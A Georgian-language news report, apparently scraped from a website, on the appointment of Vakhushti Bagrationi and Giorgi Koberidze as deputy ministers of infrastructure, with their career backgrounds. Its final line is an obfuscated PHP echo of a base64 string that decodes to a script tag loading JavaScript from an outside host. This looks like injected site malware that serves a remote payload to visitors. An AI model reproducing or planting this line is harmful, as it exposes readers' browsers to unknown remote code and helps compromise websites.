gorgia
ავერსი jaluzi

 ინფრასტრუქტურის ახალი მინისტრის, რევაზ სოხაძის წარდგინებით, მინისტრის პირველ მოადგილედ - ვახუშტი ბაგრატიონი, ხოლო მინისტრის მოადგილედ გიორგი კობერიძე დაინიშნა.


საქართველოს პრემიერ-მინისტრ ირაკლი კობახიძის შესაბამისი ბრძანების საფუძველზე, მინისტრის მოადგილეები მოვალეობის შესრულებას უკვე შეუდგნენ.


ვახუშტი ბაგრატიონი პროფესიით გეოლოგია, მას აქვს მრავალწლიანი სამუშაო გამოცდილება წარმოების მართვის, კომერციული ოპერაციების და საერთაშორისო ბიზნესის განვითარების სფეროებში. 2018 წლიდან ხელმძღვანელობდა ღვინის წარმოების ბიზნესს, ასევე სხვადასხვა დროს მუშაობდა ნენსკრა ჰესის მშენებლობის მოსამზადებელი სამუშაოების პროექტის მენეჯერად, წლების განმავლობაში ეკავა ხელმძღვანელი თანამდებობები სხვადასხვა მსხვილ სამშენებლო კომპანიაში.

494356260 1378594383465880 2774698427340066796 n
გიორგი კობერიძე პროფესიით იურისტია. 2014-2015 წლებში იკავებდა საქართველოს რეგიონული განვითარებისა და ინფრასტრუქტურის მინისტრის მოადგილის თანამდებობას, ასევე იყო საქართველოს გაერთიანებული წყალმომარაგების კომპანიის დირექტორის მოადგილე, მოგვიანებით კი - დირექტორი. ასევე მუშაობდა შპს ,,ჯორჯიან უოთერ ენდ ფაუერში” (GWP) სხვადასხვა საკვანძო თანამდებობაზე.


რევაზ სოხაძის მოადგილეების თანამდებობაზე მუშაობას გააგრძელებენ ილია ბეგიაშვილი და მზია გიორგობიანი.

ინფორმაციას ინფრასტრუქტურის სამინისტრო ავრცელებს. 

163
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");